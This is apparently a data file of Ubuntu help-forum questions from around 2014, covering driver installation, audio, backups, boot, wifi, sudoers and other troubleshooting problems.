487761	installing ati catalyst 14.20 beta on ubuntu 12.04 throws error	the internet is full of this kind of issues , like the guys from ati would n't even bother to test their installers . i am trying to get the latest driver because skyrim ( with wine ) freezes so badly that i have to un-plug/reset the computer . i am trying to see if the latest driver would fix that because the error is related to fglrx . by the way , the log is : kernel : [ 72.180644 ] fglrx_pci 0000:01:00.0 : irq 48 for msi/msi-x kernel : [ 72.181039 ] < 6 > [ fglrx ] firegl kernel thread pid : 1942 kernel : [ 72.181101 ] < 6 > [ fglrx ] firegl kernel thread pid : 1943 kernel : [ 72.181163 ] < 6 > [ fglrx ] firegl kernel thread pid : 1944 kernel : [ 72.181230 ] < 6 > [ fglrx ] irq 48 enabled kernel : [ 72.226636 ] < 6 > [ fglrx ] reserved fb block : shared offset:0 , size:1000000 kernel : [ 72.226638 ] < 6 > [ fglrx ] reserved fb block : unshared offset : f878000 , size:4000 kernel : [ 72.226639 ] < 6 > [ fglrx ] reserved fb block : unshared offset : f87c000 , size:484000 kernel : [ 72.226640 ] < 6 > [ fglrx ] reserved fb block : unshared offset:7fff4000 , size : c000 anacron [ 1960 ] : anacron 2.3 started on 2014-06-24 anacron [ 1960 ] : normal exit ( 0 jobs run ) so , here i go . i download the archive from ati ( linux-amd-catalyst-14.6-beta-v1.0-may23.zip ) and extract the files . now i uninstall the existing fglrx driver by doing this : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* sudo dpkg-reconfigure xserver-xorg the first one works fine and i can see that fglrx is removed . the second one , obviously , throws me this sh*t : package 'xserver-xorg ' is not installed and no info is available . anyway , i start the new driver 's installer after going to its location : sudo ./amd-driver-installer-14.20-x86.x86_64.run the first error is this : ./lokixml.sh : 143 : ./lokixml.sh : [ [ : not found the ugly setup window shows up and after i click continue/i agree/continue i get a pop-up window ( even uglier ) telling me to go fu*k myself and check errors log . i decide to take them one by one so , in order to fix the first error i have to extract the .run file : ./amd-driver-installer-14.20-x86.x86_64.run -- extract then open the file lokixml.sh from the folder , where i must comment out lines 143 to 145 . after that i run the install script : sudo ./ati-installer.sh 14.20 -- install the lokixml.sh error is gone but i still get the ugly pop-up so i go to the log file and find this : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:14.200-0ubuntu1 dpkg-buildpackage : source changed by amd : advanced micro devices . < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.hm3zeh dpkg-buildpackage : host architecture amd64 debian/rules build ca n't exec `` debian/rules '' : permission denied at /usr/bin/dpkg-buildpackage line 529. dpkg-buildpackage : error : debian/rules build failed with unknown exit code -1 [ error ] generate package - error generating package : ubuntu/precise in this page i find out that i have to mount some temporary directory and then start the installer , so i do : mkdir ~/tmptmp sudo mount -- bind ~/tmptmp /var/tmp sudo ./ati-installer.sh 14.20 -- install sudo checkinstall make install sudo umount /var/tmp but i get the same pop-up and errors in the log file , so here is where i am stuck , with the previous driver uninstalled and the new one unable to be installed . my ati card is a hd 7670 m , on a hp pavillion g6 2306-sq i found another howto here but now , when i do : sudo sh ati-installer.sh 14.100/14.20 -- buildpkg i get an error saying : parsechangelog/debian : warning : debian/changelog ( l0 ) : found eof where expected first heading parsechangelog/debian : error : fatal error occurred while parsing input dpkg-buildpackage : error : changelog parser /usr/lib/dpkg/parsechangelog/debian gave error exit status 255 this is never ending after trying other solutions i have managed to mess it up completely . black screen and no way to recover my files . so , iâ´m going back to windows . fu*k this piece of crap , if i wanted a computer only able to throw me a terminal and some useless commands i would buy a brick . linux , youâ´re going down .
487767	chrome browser v35 no sound	i have chrome 35 and firefox 28 installed on my ubuntu 14.04 os . unfortunately , i have no sound when viewing youtube or a website with video using chrome . with firefox i have sound . i would like to use chrome for my kiosk application . can anyone offer some help to get sound to work on chrome ?
487770	deja-dup back up fail unknown error ubuntu 14.04	using ubuntu 14.04 for a short time . back up started failing and returning this message : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1494 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1488 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1337 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1370 , in do_backup globals.archive_dir ) .set_values ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 697 , in set_values self.get_backup_chains ( partials + backend_filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 819 , in get_backup_chains map ( add_to_sets , filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 809 , in add_to_sets if set.add_filename ( filename ) : file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 100 , in add_filename ( self.volume_name_dict , filename ) assertionerror : ( { 1 : 'duplicity-inc.20140615t154649z.to.20140616t205256z.vol1.difftar.gz ' , 2 : 'duplicity-inc.20140615t154649z.to.20140616t205256z.vol2.difftar.gz ' , 3 : 'duplicity-inc.20140615t154649z.to.20140616t205256z.vol3.difftar ' } , 'duplicity-inc.20140615t154649z.to.20140616t205256z.vol3.difftar.gz ' ) advice please ?
487774	how do i clear my boot drive ?	every time that i boot up my computer , it gives me a warning that my /boot drive is full , even though i 've cleared everything i can from the computer . how do i clear it ? there is nothing on my computer that is important so i 'd like to just delete everything if i can .
487775	conflict file between nvidia-common and nvidia-installer-cleanup	when i attempt to add or remove any package , i get an error message from apt-get : the following packages have unmet dependencies : ubuntu-desktop : depends : nvidia-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . trying apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : nvidia-common the following new packages will be installed : nvidia-common 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . 1 not fully installed or removed . need to get 0 b/19.0 kb of archives . after this operation , 155 kb of additional disk space will be used . do you want to continue [ y/n ] ? preconfiguring packages ... ( reading database ... 430130 files and directories currently installed . ) unpacking nvidia-common ( from ... /nvidia-common_1 % 3a0.2.44.2_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/nvidia-common_1 % 3a0.2.44.2_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/nvidia/pre-install ' , which is also in package nvidia-installer-cleanup 20131102+1~bpo70+1 errors were encountered while processing : /var/cache/apt/archives/nvidia-common_1 % 3a0.2.44.2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) exit 100 apparently two packages , nvidia-common and nvidia-installer-cleanup , share the same file , pre-install , which prevents nvidia-common from being installed , which prevents anything else from being installed . the truth is , i use a proprietary radeon driver and do not even need nvidia . p.s . the output of dpkg -l | grep glx : ii glx-alternative-fglrx 0.4.1~bpo70+1 allows the selection of fglrx as glx provider ii glx-alternative-mesa 0.4.1~bpo70+1 allows the selection of mesa as glx provider ii glx-diversions 0.4.1~bpo70+1 prepare for using accelerated glx implementations from gpu vendors ii libgl1-mesa-glx 8.0.4-0ubuntu0.7 free implementation of the opengl api -- glx runtime ii libgl1-mesa-glx : i386 8.0.4-0ubuntu0.7 free implementation of the opengl api -- glx runtime rc libglitz-glx1 0.5.6-1build1 glitz opengl library glx backend ii libswt-glx-gtk-3-jni 3.7.2-2 standard widget toolkit for gtk+ glx jni library ii libxcb-glx0 1.8.1-1ubuntu0.2 x c binding , glx extension ii libxcb-glx0 : i386 1.8.1-1ubuntu0.2 x c binding , glx extension the output of apt-cache rdepends nvidia-common : nvidia-common reverse depends : jockey-common nvidia-common : i386 ubuntu-desktop jockey-common nvidia-common : i386 xubuntu-desktop ubuntustudio-desktop nvclock-qt nvclock-gtk nvclock mythbuntu-common lubuntu-core ubuntu-desktop kubuntu-desktop jockey-common the output of apt-cache policy nvidia-common nvidia-installer-cleanup : nvidia-common : installed : ( none ) candidate : 1:0.2.44.2 version table : 1:0.2.44.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 1:0.2.44 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages nvidia-installer-cleanup : installed : 20131102+1~bpo70+1 candidate : 20131102+1~bpo70+1 version table : *** 20131102+1~bpo70+1 0 100 http : //http.debian.net/debian/ wheezy-backports/contrib amd64 packages 100 /var/lib/dpkg/status
487777	plasma-nm configuration files broken ?	plasma-nm does n't work properly , as you can see in the attached image . well , it seems i 've not enough reputation to attach images , sorry ... but on this site you can see exactly the same image and it 's in english . this happened after i tried to copy my home-directory from my old notebook to my new one by this guidiance . on my old notebook was the same behavior , therefor i think i just overwrote the old configurationfile . can i overwrite it back by copying the files from a healthy system ? so this is what i 've done so far to solve this problem : purged and reinstalled plasma-nm , libnetworkmanagerqt1 , libmodemmanagerqt1 , plasma-widget-networkmanagement but this did n't change anything : - ( i found something like this , i have no clue if this can be a sollution just by changing ubuntu-desktop to kubuntu-desktop in my case . can you advice me what to do ? addendum : a newly created user has this problem too
487780	screensavers on multiple monitors	i 'm looking to set a screensaver up on one monitor while leaving my other monitor available for work . i 'm currently using xscreensaver and a vga . is there some sort of option i can ask for declare a screensaver on one monitor and leave the other open ? thanks !
487781	automate google chrome installation on 14.04	is there a way to completely automate google chrome installation on a new machine ? i have the following commands working in a bash script : cd /tmp wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb sudo dpkg -i google-chrome-stable_current_amd64.deb rm -f google-chrome-stable_current_amd64.deb but i still have to interact with the installation process when chrome asks to be standard browser and whether to send crash reports or not .
487782	can ssh into target ubuntu machine fine on target 's boot , but later the connection attempt times out on the client	i have two computers in the house , one is ubuntu running openssh-server , the other is either a vm ubuntu with an openssh client or putty on windows . when i boot up the server machine i can ssh into fine from the client . however , if i want to do this a few hours later ( after i 've disconnected from before ) the connection attempt times out . i do n't know what the problem is . i do n't feel like server/client alive intervals would do anything because that applies for when the connection is already made . though i 'm wondering if the default ubuntu 'lock after inactivity ' has has anything to do with it ? like when you have to sign back in after you 've been away ? any help is much appreciated !
487783	unable to connect to wifi , but able to connect to android hotspot	previously , i have used ubuntu for a short while . and i have installed 14.04 back then and everything worked perfectly . i was able to connect to all wifi hotspots , to my router as well . today , after removing linux distro a couple of weeks ago , i installed ubuntu 14.04 back again and now i have this weird issue : i am unable to connect to my routers wifi , even though nothing changed in it . all the settings are the same . i have tried to disable routers wifi security - did n't help . i have tried to set up android hotspot and was able to connect to it without any issues . where should i even start to dig in order to fix this problem ? my wifi card is intel wifi link 1000bgn . settings of my wifi network ( 2.4ghz ) : network mode : mixed ; channel width : auto ; channel : 6 ; ssid broacast : enabled
487785	why ca n't a process see environment variables set in /etc/environment ?	i defined several environment variables in /etc/environment , but a process ( build started by teamcity ) can not see their values . i do n't know what i 'm doing wrong here.. this is the content of my /etc/environment file : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' catalina_base= '' /var/lib/tomcat7 '' catalina_home= '' /usr/share/tomcat7 '' activemq_home= '' var/lib/activemq '' activemq_base= '' var/lib/activemq '' activemq_conf= '' var/lib/activemq/conf '' activemq_data= '' var/lib/activemq/data '' activemq_opts_memory= '' -xms128m -xmx192m '' m2_home= '' /usr/share/maven3 '' maven_home= '' /usr/share/maven3 '' java_home= '' /usr/lib/jvm/java-8-oracle '' the build started by teamcity uses a maven runner , and which at some point kicks an ant build . since the build was failing , i used ant to print all environment variables in the system : < ! -- provides all environment variables as ant properties prefixed by `` env. '' . for example , classpath would be accessible in ant as $ { env.classpath } -- > < property environment= '' env '' / > < echo > list of all environment variables found in the system : < /echo > < echoproperties > < propertyset > < propertyref prefix= '' env . `` / > < /propertyset > < /echoproperties > sure enough , the ones i set in /etc/environment do n't show up . the build agent running this is started using ubuntu 's startup app 's , where i configured it to run the command : sudo -h -u administrator /bin/bash -- login -c `` ~administrator/buildagent/bin/agent.sh start '' could it be that this line runs before /etc/environment are set ? if i do a echo $ catalina_home i see the value properly set , but the build for some reason can not see it ... note : although i know it is the wrong way of doing it , i also tried adding export to the declarations inside /etc/environment , without any success . then i removed it . note 2 : i rebooted the machine after making changes to /etc/environment file , of course . i 'm on 14.04 lts server with minimal desktop installed ( ubuntu-desktop -- no -- install-recommends ) plus a few extras . any help is appreciated , thank you !
487787	multiple background scripts in one command	i can run three scripts at once like this : python script1.py ; python script2.py ; python script3.py but when i try to run them all in the background , like this : python script1.py & ; python script2.py & ; python script3.py & i get this : syntax error near unexpected token ` ; ' i also tried using only one ampersand at the very end , but that made only one process run in the background . i want to launch them in one command because the scripts print to the screen continually , making it hard to enter new commands . how can i do this ? ( the scripts do n't have main ( ) functions , in case your thoughts were tending in that direction . )
487792	system froze when upgrading from 12.04 to 14.04 . i ca n't log in !	i was using 12.04 lts well . some minutes ago , i wrote sudo update-manager -d to console and started to updating . it download update files and started to upgrade system . when it was going on , `` home '' symbol ( where top of the left bar ) turn to question mark and i wonder why it happened so i clicked the symbol and system froze . ( upgrading had n't been finished ) then i restart system and tried to log in but it showed me and open log in page again . i want to recover my system without format if it possible so what should i do ? i am new at ubuntu so what can be the problem ? i just want to learn somethings from this experience : ) thanks for all helps . : )
487794	dnsmasq does not start on os boot	i tried : $ update-rc.d dnsmasq defaults system start/stop links for /etc/init.d/dnsmasq already exist . status : $ service -- status-all | grep dnsmasq [ ? ] apport [ ? ] console-setup [ ? ] cryptdisks [ ? ] cryptdisks-early [ ? ] dns-clean [ - ] dnsmasq [ ? ] irqbalance [ ? ] killprocs [ ? ] kmod [ ? ] mysql [ ? ] networking [ ? ] ondemand [ ? ] pppd-dns [ ? ] rc.local [ ? ] sendsigs [ ? ] speech-dispatcher [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot and it still does not auto start . i need to start it manually each time with : $ service dnsmasq start
487796	block certain websites on ubuntu for main user	i have a problem with some kind of internet addiction . i want to block some sites on my ubuntu 12.04 for myself . changing dns and /etc/host doesent help couse i know pass and any time when i fill myself frustraded can chenge dns back and after that find myself searching through the stupid websites rather than work . is there any solution ? maybe some type of a programm where i need to enter long pass to change settings of internet connetcion . and this pass will differ from pass of my login which i always use . and i can stash this long pass far from me in a deep dark wood digged in a hole . i hope my question is clear enought . thanks .
487797	fluxbox aterm transparency	i set up a script that runs once fluxbox is started and it opens a terminal ( aterm ) . this terminal is supposed to have a level of trasparency different than the others and it reamins in the `` background '' ( maybe that 's not the proper word ) of my desktop . here 's the command in my ~/.fluxbox/startup aterm -name aterm -sl 5000 -tr -sh 40 -geometry 130x50+100+5 if -tr is seted - > transparency is enabled and it ignores -sh atribute ( 40 % ) and transparency is set to 100 % . if -tr is not seted - > no transparency , the background is black . also , it ignores the parameters passed to -geometry . it does n't set the resolution nor the position in the screen . i made the tests running this command on terminal .
487800	create a file server that is accessible from the internet	i want to turn my ubuntu computer into a server that allows users to download files from it over the internet . however , i want to have it setup so people can just download files by connecting to its external ip address , then enter some folders and download the files with their browser . i would like it to be ftp or http , but setting either of these up seems very complicated . how should i go about setting this up ? i tried using gadmin-proftpd but it always crashes .
487801	after upgrading to gnome 3 right click brings up no context menu	after i upgraded to gnome 3 on ubuntu 14.04 , right clicking on the desktop does not bring up context menus , but context menus show up in applications . i followed these commands to upgrade : sudo apt-get update sudo apt-get install gnome-shell ubuntu-gnome-desktop then i restarted the computer . ubuntu 14.04 , noveau video driver , gnome 3 .
487805	junk file after compiling	every time i compile software i get a lot of useless files and folders after compiling ( junk files ) however i do not know what files to delete because i am afraid it might damage the software . for example this situation so is there a way to automatically remove junk files after compiling or a way to safely spot junk files and remove them manually compiling this particular software building get the official 1.40 source from http : //nestopia.sourceforge.net/ unpack it unpack this overlay over it go to the directory where you unpacked this and type `` make '' . ( `` make -j3 '' for dual-core , `` make -j5 '' for quad ) . before running the emulator , copy the following files to a folder named .nestopia please not i have not installed this software .
487812	emachines t3104 lubuntu 14.04 please help !	i have a emachines t3104 desktop . it works fine with lubuntu 14.04 , but after a short period of time the computer locks up and i have to restart it . i have a via k8m800 graphics and i have seen many other people on the forums have problems with this graphics chip set . the question i have is if you can install lubuntu 14.04 without the lockups , and if so , how ? buying a new computer or graphics card is not really an option right now .
487814	ubuntu 14.04 lts install	i tried to install the new ubuntu that i downloaded from the official website . i burned it to a dvd and when everything loads up i get as far as the connect to wifi and that has a green check mark by it , but the drive space says i need at least 6.4 gb of hard drive with a gray x next to it . i bought a new internal hard drive and tried the install on that and it still says the same thing . the disc is rewritable and hard drives are 160gb and the new hard drive is 500gb 5400 rpm . the continue button does not light up as it is not recognizing . i have sufficient hard drive space . what am i doing wrong . has anyone else come across this issue ? thanks .
487815	kubuntu-desktop took over everything	i installed kubuntu-desktop via software centre but now everything is messed up in unity . as if the theme was changed but it 's still `` ambiance '' ( the default ) . it even affects lxde . for example ... icon theme was changed to some other icon theme . some fonts are different like in google chrome , fonts like `` hardware insights juju ... '' are n't supposed to be that thin . also in the indicators ' menus ; you see it 's not even readable and the icon for the language ( that looks like this -- > [ en ] ) is missing . notifications look like kubuntu 's . double click to maximize does n't work any more . it glitches in a weird way . also there 's a bug when switching workspaces but it 's hard for me to explain . grub has a black background now . after grub , there should appear `` ubuntu '' with 5 dots below it . instead appears `` kubuntu '' flashing . who knows what else would i discover : / what i want : a clean unity desktop . a brand new one . and i want grub back to its old look . i tried to reinstall unity but it does n't work . it only uninstalls a few megabytes leaving behind loads of dependencies which really matter and nothing gets fixed . i like kde as long as it does n't mess things up . can someone please tell me how to reinstall it or at least any workaround to all those problems though i really really do n't prefer this . i 've tried this q & a but no joy : ubuntu is kde styled after install and removal i 've tried to reset my unity configuration using this q & a but this also didnt work : how do i reset my unity configuration ?
487816	gnome problem with 14.04	i got an install of 14.04 server on my vps . i then installed the gui with : sudo apt-get install ubuntu-desktop , then installed vnc with vnc4server . now i have this really , bugged gray screen instead of the normal ubuntu ui . can someone help me ?
487818	getting dropbox to sync at start-up problem	dropbox : i expect it to sync at start-up , with the dropbox icon in top bar . however , the only way i can open dropbox is by running ~/.dropbox-dist/dropboxd which does work , but only while the terminal is open . furthermore , i get this strange error , which i 'm not finding in any threads : ( dropbox:8515 ) : gtk-warning ** : unable to locate theme engine in module_path : `` adwaita '' , i initially installed with : cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - then opened with : ~/.dropbox-dist/dropboxd and logged into account . when i close terminal , dropbox vanishes . ubuntu 14.04/unity/64bit
487820	does `` resize2fs '' work like this ?	i read how to use `` resize2fs '' but something is not very clear , would like to confirm if the following steps are correct . my goal is to do resizing without losing data . i can use rescue cd to boot first . 1. delete partition 2. re-create partition ( with both starting and ending position changed ) 3. resize2fs like below , # parted /dev/sda -- script -- rm 3 # parted /dev/sda -- script -- mkpart primary 80000 100000 # resize2fs /dev/sda3 my guess is `` resize2fs '' will automatically resize the file system according to the partition table , correct ? thanks .
487821	unable to use netflix - still asked to install silverlight . firefox , pipelight , silverlight enabled , passed troubleshooting	i have recently got hold of a new laptop running ubuntu 14.04 . i tried to set up netflix using the pipelight package as i had done previously on my old laptop using mint 14 . now however , despite having followed the installation and configuration instructions given for ubuntu and installing and configuring user agent overrider on firefox . however , i 'm still confronted with a message telling me i need to install the silverlight plugin when i try to watch anything on netflix . i have also troubleshooted as described on their faq and everything seems fine . i 've trawled the internet for solutions , but ca n't seem to work it out . does anyone please have any suggestions as to why this might be and how i might fix it ?
487824	nvidia geforce go 7150m ( uma ) usb install	i upgraded to ubuntu 14.04 from a clean install . i do not have the nvidia geforce go 7150m ( uma ) driver saved on the pc anywhere only on a usb drive . i can not get the pc to boot up passed the loggin screen to install the driver . the graphic card fails even when i try to boot in `` safe mode '' . is there anyway to install this driver from the prompt ? or do you have any other ideas to fix the problem ? thanks !
487825	why does ubuntu delete every partition on your drive without asking you ?	i installed ubuntu 14.04 on monday , and on tuesday i installed windows 8.1 , and then i had to reinstall all my applications onto windows . on my 2 terabyte disk , i had 1 terabyte ntfs ( windows ) partition and 1 terabyte of ubuntu ( ext ? ) partition . upon trying to repair the ubuntu boot up , i reinstalled ubuntu . i was given the option to replace the existing ubuntu installation with a new installation . i was not asked if i wanted to nuke the 1 terabyte ntfs partition and erase all partitions . this is ubuntu lts 14.04 update : it turns out ubuntu may not have known there was a partition there . the tools it relies on to tell it may be suffering from an inconsistency in windows 8.1 's partitioning that renders the partitions `` invisible '' to the fdisk tool that the installer probably relies on . update 2 : with gparted live-cd it is possible to clear the `` gpt '' artifacts from the disk allowing ubuntu installer to detect my windows partitions and not erase them .
487828	hidden files wo n't stay hidden in ubuntu 14.04 lts	whenever i open my files , my hidden files show up . i can hide them but when i open up my files again , they 're showing again . how do i make the hidden files invisible permanently ?
487829	global media keys for moc	i would like to control moc ( music on console player ) with multimedia hotkeys . i know that i can use for example xbindkeys and set custom action controlling the moc . but , when i do that , global hotkeys stop working with other applications . is there any other way to do it or is there a way to tell xbindkeys to do multiple actions - one for controlling the moc and second just applying the global hotkey as usual ?
487833	can someone help me with windows 7 installation ?	i 'm trying to dual boot ubuntu and windows 7 . i used to initially have windows , but after installing ubuntu , i ca n't find it anywhere and have no clue what happened . yes , i 'm an idiot , because i did n't back up . now that i got the installation for windows and created an unallocated drive for space , i keep getting an error message saying partition on boot disk needs at least 829 megabytes of free space ( i have 10gb of unallocated space ) . i tried using gparted , but nothing works . i keep getting the error message : i just need to know how to install windows 7 on ubuntu . no websites really explain it . apparently i did n't notice it was using wine this whole time . but aside from that , how can i install windows 7 without wine and alongside ubuntu ?
487835	boot problems with ubuntu and windows	i have windows xp on my c drive and windows 7 on d drive . i loaded ubuntu 14.04 over windows 7 on d. it gives me my old boot screen of either windows xp or windows 7 , and it will not boot to ubuntu .
487836	ubuntu 14.04 ltsp thin client direct x option fails to load unity	i have been experimenting setting up an ltsp server over the past few days . i 've previously done this with 12.04 , and i found that i could get a workable session going using the ubuntu 2d session option , i.e . unity 2d . i 've now upgraded the server to 14.04 , and so unity 2d is not an option any more . my client is able to boot ltsp via pxe correctly , and i can log in as a user , but i have found that if i enable the option in /var/lib/tftpboot/ltsp/i386/lts.conf ldm_directx=true then i can not see the unity menu at all after login from the client , all i see is the desktop background image . if i set this to false , then i can see unity but it runs so slowly that the client is practically unusable , and sometimes the top menu bar fails to appear . the server is a quad-core i7 overclocked to 4.4 ghz , with 16 gb of ram and a ssd root partition , although only using intel graphics . there is a gigabit lan connection between the server and client . so the server should be capable enough . needless to say , unity runs fine by direct login on the server . what do i need to do to get unity working on my client ? might it work better as a fat client , with unity running on the client hardware ? ( the client is an older desktop pc , it can run unity itself ) .
487840	multimedia keys recognized but not working 14.04	so all my multimedia keys are recognized when i choose the shortcuts but my volume keys do not work ( all others do ) . if i assign another key to any volume control it works , just not my volume keys . i do not believe this is a duplicate because no other users had this exact problem ( and i have tried many of their solutions )
487842	removing a channel in smart package manager ( smartpm )	with python-rpm and python-smartpm installed , i seem to have smart package manager installed on my 12.04 machine . it also populated with some default package channels - which i do n't need at all . i have a local repository that i have built myself . so i would like to remove them . the problem is with the command smart channel -- remove [ alias ] , the channel [ alias ] does not get removed . the command runs without error . yet when i run smart channel -- show , it still appears ! i even tried smart update . no dice . any pointers will be appreciated !
487844	how do i have number lock always on ?	i basically want to disable the number lock on my computer , and always have it on . i have keys elsewhere on a full size keyboard that do the functions of the keys when they are in a non-numlock state , and i constantly use the numberpad , so when it gets turned off , or is just not even on at boot , i always get messed up in what i do , i want to lock the numberpad for my laptop to always on , even if it means that the non-numlock functions are forgone .
487845	why does sudoers only allow me to set nopasswd for all ?	i 've been beating my head against the wall for about six hours on this one , so i figured i 'd go ahead and finally ask here . apologies in advance if i 'm missing something obvious ; i 've been reading extensively on this , but it 's totally possible i overlooked something . my situation is this : i 'm trying to give the www-data user the ability to sudo-execute some shell scripts , so that i can have a page on my web server display system information ( in php using shell_exec ( ) ) . to this end , i edited my sudoers file with the following line www-data all= ( all : all ) nopasswd : /home/evermind/scripts/* to give apache the ability to run scripts in that directory without needing a password for suoo . unfortunately , this does n't work , nor does ( as a sanity check ) specifying a specific script within that directory . shell_exec fails to execute the command , and gives the following error : '' sudo : no tty present and no askpass program specified '' this is where things get ... strange . if i replace the path specification with `` all '' then everything works perfectly . why is this ? is there a reason i ca n't specify nopasswd for individual files or directories ? for security reasons , i am extremely hesitant to allow www-data free reign over everything , even though the web application is extremely secure and there is n't an obvious way anyone could execute arbitrary commands . thanks !
487847	ca n't make netflix work	i have followed all of the installation instructions from here and here , and neither the pipelight silverlight plugin or the netflix desktop works ; both tell me to install the microsoft silverlight plugin . what else can i do ? i am using ubuntu 14.04 lts .
487849	copy share a file between xubuntu virtual machine and windows 8.1 host in virtalbox without guest add-ons	ubuntu ! tl ; dr at the bottom i 'm on a windows 8.1 host . i installed xubuntu 14.04 on a virtual machine in oracle 's virtualbox . the guest add-ons could n't install properly . the cd shows all the time when i press the button to add the guest add-ons however i 'm only able to access it at random times o_o . i 'm rather new to linux/virtualization but know to open a command winnow inside the cd directory and type in sudo sh vboxlinuxadditions.run in order to install the vbox linux addons . that 's what i did when the cd was accessible to me . the installation seemed ok so i restarted the system . it did n't work but i did n't really care because i was switching to a confortable resolution from xubuntu 's display options . my problem lies here : i have gotten my hands on some 10 gbs of files inside of my xubuntu guest . i 'd like to be able to transfer them to my windows 8.1 host without any vbox linux guest add-ons . anyone can please help me to find out how to tat ? it would be really appreciated to a complete newbie that is really ambitious to find out why linux is better and safer to encourage a lot of people to use it ! : ) thank you very much ! tl ; dr : how can i transfer files from a xubuntu 14.04 lts oracle virtualbox virtual machine guest to a windows 8.1 host without the linux guest add-ons . thank you !
487851	ubuntu 14.04 alt+shift and eclipse problem	i have us , and greek layout options and i switch between these using alt+shift . 1.i use eclipse and i am very used to pressing alt+shift+r in order to use an application 's shortcut . in ubuntu i ca n't do this since the moment i press alt+shift , the layout changes and i ca n't proceed to the shortcut 1.if the selected layout is greek i ca n't make use of shortcuts like ctrl+c , ctrl+v , ctrl+a etc .
487852	help with kde/login errors/desktop migration ?	i had a 32 bit installation that i moved to another computer that supports 64 bit , so i installed 64 bit ubuntu on another partition , though on the original partition i had my home folder on another partition , with a shortcut to it located in the home directory on the main installation partition , so i moved the folder to the root of the partition after creating a user with the same username , overwriting the previous folder , and now i can not open that account with any desktop environment , it exits out back to the logon screen as soon as i press enter after inputting my password . also , my other account does the same thing when i try to login with a kde session . any ideas ?
487856	gvim does n't show up in the nautilus context menu for .c and .h files	most of the time i can browse the file system with the file browser , right-click on a file and top item in the menu `` open with gvim '' , but when i right-click on a .c or .h file , it says `` open with ( some inferior editor ) '' . i mouse over to the `` open with '' submenu , and gvim does n't appear in there , either . even when i go into `` other application '' and browse through the programs , it does n't show up . what gives ?
487860	shifting between alternate versions of python in ubuntu	i am new to ubuntu and i wanted to shift my version to python 3.4.1 . so i ran the command : $ sudo update-alternatives -- config python update-alternatives : error : no alternatives for python but then i try to run command : $ sudo apt-get install python3.4 reading package lists ... done building dependency tree reading state information ... done python3.4 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 14 not upgraded . i do n't know how to switch between the versions . please help .
487861	booting directly to a virtualbox vdi ?	i 'm have ubuntu 14.04 installed , and i have windows 8.1 as a virtualbox vdi . i would like to configure grub to allow me to boot directly into the virtualbox vdi . is this possible ? thanks
487865	are ubuntu software center mirrors safe ?	could the admin of a mirror server/ isp attach a trojan into or fake a package ? it 's all my question . this sentence is just spam . you do n't need to read . why it is difficult to post a question here . : d
487868	no tty after installing nvidia driver	when i first installed ubuntu 14.04 , i used the command line to install the nvidia drivers to my computer . now , if i try to open any of the 6 ttys , i lose all display and my monitor cuts off until i exit back to the gui . is there any way i can fix this ?
487869	wine , steam , games crash after launch .	i 'm running steam through wine since most or possibly all my games are n't officially out on linux , and every time i start a game either a few seconds later or my first key stroke or mouse click , the game crashes . one of the reasons i went to ubuntu was that everyone says i can run steam and all of my games through wine . but if that is not going to be the case , i would have stuck with vista . any help would be greatly appreciated .
487870	lubuntu 14.04 wifi on laptop with broadcom bcm4322	i 'm preparing for a trip where i ca n't bring my desktop , so i recently broke out my trusty old laptop ( dell latitude e4300 ) to get it ready for the trip . previously , i had ubuntu 12.04 lts on the machine and there were no problems with wifi or the computer in general . my original problem came when i tried to upgrade to ubuntu 14.04 , which failed halfway through and long story short : i could n't get it to work . i then installed lubuntu 14.04 ( it 's a moderately old laptop and i had never tried lubuntu , so why not ) and it 's going great , except , i ca n't connect to my wifi and since this will be my only method of access on my vacation , i really need to fix it . i 'm kinda at a cross roads since i 've never had this problem with this laptop . any help would be great . the output of `` lspci -nvn | grep -i net '' says the wifi card is a `` broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) '' i have looked at many other similar questions , but they 're all very old and none have helped . sorry if you guys get this a lot . edit : here is the link to the requested diagnostics ( see comment by user `` wild man '' _ http : //pastebin.ubuntu.com/7700888/
